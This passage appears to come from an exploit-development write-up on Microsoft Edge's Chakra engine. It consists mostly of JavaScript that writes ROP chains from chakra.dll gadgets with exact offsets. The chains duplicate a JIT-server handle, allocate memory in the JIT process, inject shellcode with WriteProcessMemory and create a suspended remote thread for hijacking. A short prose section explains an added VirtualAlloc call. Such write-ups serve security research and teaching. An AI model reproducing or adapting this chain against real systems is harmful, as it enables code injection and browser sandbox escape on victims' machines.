write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     				   // Recall RAX already has a writable pointer in it

// Call KERNELBASE!VirtualAllocEx
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xff00, kernelbaseHigh); // KERNELBASE!VirtualAllocEx address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!VirtualAllocEx)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!VirtualAllocEx - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD flProtect (RSP+0x28) (PAGE_READWRITE)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain
// Stage 3 -> Write our shellcode into the JIT process

// Store the VirtualAllocEx return address in the .data section of kernelbase.dll (It is currently in RAX)

/*
0:015> dq kernelbase+0x216000+0x4000 L2
00007fff`58cfa000  00000000`00000000 00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where we will store VirtualAllocEx allocation
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00001000, 0x00000000);             // SIZE_T nSize (0x1000)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();                                                                     // Recall RAX already has a writable pointer in it

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000-0x8, kernelbaseHigh); // .data section of kernelbase.dll where we have our VirtualAllocEx allocation
next();                                                                            // (-0x8 to compensate for below where we have to read from the address at +0x8 offset
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x255fa0, chakraHigh);      // mov rdx, qword [rdx+0x08] ; mov rax, rdx ; ret
next();

// LPCVOID lpBuffer (R8) (shellcode in chakra.dll .data section)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000, chakraHigh);    	  // .data section of chakra.dll holding our shellcode
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// CreateRemoteThread() ROP chain
// Stage 4 -> Create a thread within the JIT process, but create it suspended
// This will allow the thread to _not_ execute until we are ready
// LPTHREAD_START_ROUTINE can be set to anything, as CFG will check it and we will end up setting RIP directly later
// We will eventually hijack RSP of this thread with a ROP chain, and by setting RIP to a return gadget our thread, when executed, will return into our ROP chain
// We will update the thread later via another ROP chain to call SetThreadContext()

// LPTHREAD_START_ROUTINE lpStartAddress (R9)
// This can be any random data, since it will never be executed
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x28b4fe, chakraHigh);	   // 0x180043c63: Anything we want - this will never get executed
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which holds our full perms handle to JIT server
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xd2125, chakraHigh);       // 0x1800d2125: mov rcx, qword [rcx] ; mov qword [rax+0x20], rcx ; ret (Place duplicated JIT handle into RCX)
next();

// LPSECURITY_ATTRIBUTES lpThreadAttributes (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // NULL (default security properties)
next();

// SIZE_T dwStackSize (R8)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);      // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // 0 (default stack size)
next();

// Call KERNELBASE!CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0xdcfd0, kernelbaseHigh); // KERNELBASE!CreateRemoteThread
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!CreateRemoteThread)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!CreateRemoteThread - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPVOID lpParameter (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000004, 0x00000000);             // DWORD dwCreationFlags (RSP+0x30) (CREATE_SUSPENDED to avoid executing the thread routine)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // LPDWORD lpThreadId (RSP+0x38)
next();

// WriteProcessMemory() ROP chain (Number 2)
// Stage 5 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rcx gadget for lpAddress

// Before, we need to preserve the thread HANDLE returned by CreateRemoteThread
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a100, kernelbaseHigh); // .data section of kernelbase.dll where we will store the thread HANDLE
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x313349, chakraHigh);       // 0x180313349: mov qword [rcx], rax ; ret (Write the address for storage)
next();

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetOne, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

// WriteProcessMemory() ROP chain (Number 3)
// Stage 6 -> Update the final ROP chain, currently in the charka.dll .data section, with the address of our shellcode in the pop rdi gadget for our "fake return address"

// SIZE_T nSize (R9)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000008, 0x00000000);             // SIZE_T nSize (0x8)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hProcess (RCX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Current process
next();

// LPVOID lpBaseAddress (RDX)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74b000+ropoffsetTwo, chakraHigh); // .data section of chakra.dll where our final ROP chain is
next();                                                                       

// LPCVOID lpBuffer (R8) (Our kernelbase.dll .data section address which points to the value we want to write, the allocation of the VirtualAllocEx allocation)
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x576231, chakraHigh);         // 0x180576231: pop r8 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x21a000, kernelbaseHigh); // .data section of kernelbase.dll where the VirtualAllocEx allocation is stored
next();

// Call KERNELBASE!WriteProcessMemory
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], kernelbaseLo+0x79a40, kernelbaseHigh); // KERNELBASE!WriteProcessMemory address 
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!WriteProcessMemory)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!WriteProcessMemory - 0x180243949: add rsp, 0x38 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)         
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // SIZE_T *lpNumberOfBytesWritten (NULL) (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38
next();

Before the call:

After the call:

Again, this is identical to last time and we use the ropoffsetTwo variable here, which is just used to essentially calculate the offset from where our VirtualProtect ROP chain began to the actual address within the ROP chain we want to update (lpAddress and our “fake” return address we want our ROP chain to jump to).

VirtualAlloc ROP Chain

This next function call may seem a bit confusing - a call to VirtualAlloc. We don’t really need to call this function, from an exploitation technique perspective. We will (after this function call) make a call to GetThreadContext to retrieve the state of the CPU registers for our previously created thread within the JIT process so that we can leak the value of RSP and eventually write our final ROP chain there. A GetThreadContext call expects a pointer to a CONTEXT structure - where the function will go and fill our the structure with the current CPU register state of a given thread (our remotely created thread).

On the current version of Windows used to develop this exploit, Windows 10 1703, a CONTEXT structure is 0x4d0 bytes in size. So, we will be setting up a call to VirtualAlloc to allocate 0x4d0 bytes of memory to store this structure for later usage.

Here is how our call will be setup:

VirtualAlloc(
	NULL,				// Let the system decide where to allocate the memory
	sizeof(CONTEXT),		// The size we want to allocate (size of a CONTEXT structure)
	MEM_COMMIT | MEM_RESERVE,	// Make sure this memory is committed and reserved
	PAGE_READWRITE			// Make sure the page is writable so GetThreadContext can write to it
);

Here is how this looks with ROP (with all previous ROP chains for context):

// alert() for debugging
alert("DEBUG");

// Store the value of the handle to the JIT server by way of chakra!ScriptEngine::SetJITConnectionInfo (chakra!JITManager+s_jitManager+0x8)
jitHandle = read64(chakraLo+0x74d838, chakraHigh);

// Helper function to be called after each stack write to increment offset to be written to
function next()
{
    counter+=0x8;
}

// Begin ROP chain
// Since __fastcall requires parameters 5 and so on to be at RSP+0x20, we actually have to put them at RSP+0x28
// This is because we don't push a return address on the stack, as we don't "call" our APIs, we jump into them
// Because of this we have to compensate by starting them at RSP+0x28 since we can't count on a return address to push them there for us

// DuplicateHandle() ROP chain
// Stage 1 -> Abuse PROCESS_DUP_HANDLE handle to JIT server by performing DuplicateHandle() to get a handle to the JIT server with full permissions
// ACG is disabled in the JIT process
// https://bugs.chromium.org/p/project-zero/issues/detail?id=1299

// Writing our ROP chain to the stack, stack+0x8, stack+0x10, etc. after return address overwrite to hijack control-flow transfer

// HANDLE hSourceProcessHandle (RCX) _should_ come first. However, we are configuring this parameter towards the end, as we need RCX for the lpTargetHandle parameter

// HANDLE hSourceHandle (RDX)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x1d2c9, chakraHigh);       // 0x18001d2c9: pop rdx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0xffffffff, 0xffffffff);             // Psuedo-handle to current process
next();

// HANDLE hTargetProcessHandle (R8)
// (HANDLE)-1 value of current process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x24628b, chakraHigh);      // 0x18024628b: mov r8, rdx ; add rsp, 0x48 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x48
next();

// LPHANDLE lpTargetHandle (R9)
// This needs to be a writable address where the full JIT handle will be stored
// Using .data section of chakra.dll in a part where there is no data
/*
0:053> dqs chakra+0x72E000+0x20010
00007ffc`052ae010  00000000`00000000
00007ffc`052ae018  00000000`00000000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72e128, chakraHigh);      // .data pointer from chakra.dll with a non-zero value to bypass cmp r8d, [rax] future gadget
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x74e010, chakraHigh);      // .data pointer from chakra.dll which will hold full perms handle to JIT server;
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0xf6270, chakraHigh);       // 0x1800f6270: mov r9, rcx ; cmp r8d,  [rax] ; je 0x00000001800F6280 ; mov al, r10L ; add rsp, 0x28 ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x28
next();

// HANDLE hSourceProcessHandle (RCX)
// Handle to the JIT process from the content process
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], jitHandle[0], jitHandle[1]);         // PROCESS_DUP_HANDLE HANDLE to JIT server
next();

// Call KERNELBASE!DuplicateHandle
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], duplicateHandle[0], duplicateHandle[1]); // KERNELBASE!DuplicateHandle (Recall this was our original leaked pointer var for kernelbase.dll)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x272beb, chakraHigh);      // 0x180272beb: jmp rax (Call KERNELBASE!DuplicateHandle)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x243949, chakraHigh);      // "return address" for KERNELBASE!DuplicateHandle - 0x180243949: add rsp, 0x38 ; ret
next(); 
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x41414141, 0x41414141);             // Padding for add rsp, 0x38 (shadow space for __fastcall as well)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // DWORD dwDesiredAccess (RSP+0x28)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000000, 0x00000000);             // BOOL bInheritHandle (RSP+0x30)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00000002, 0x00000000);             // DWORD dwOptions (RSP+0x38)
next();

// VirtuaAllocEx() ROP chain
// Stage 2 -> Allocate memory in the Edge JIT process (we have a full handle there now)

// DWORD flAllocationType (R9)
// MEM_RESERVE (0x00002000) | MEM_COMMIT (0x00001000)
/*
0:031> ? 0x00002000 | 0x00001000 
Evaluate expression: 12288 = 00000000`00003000
*/
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x577fd4, chakraHigh);      // 0x180577fd4: pop rax ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x72E128, chakraHigh);      // .data pointer from chakra.dll (ensures future cmp r8d, [rax] gadget writes to a valid pointer)
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], chakraLo+0x46377, chakraHigh);       // 0x180046377: pop rcx ; ret
next();
write64(stackleakPointer[0]+counter, stackleakPointer[1], 0x00003000, 0x00000000);             // MEM_RESERVE | MEM_COMMIT
next();
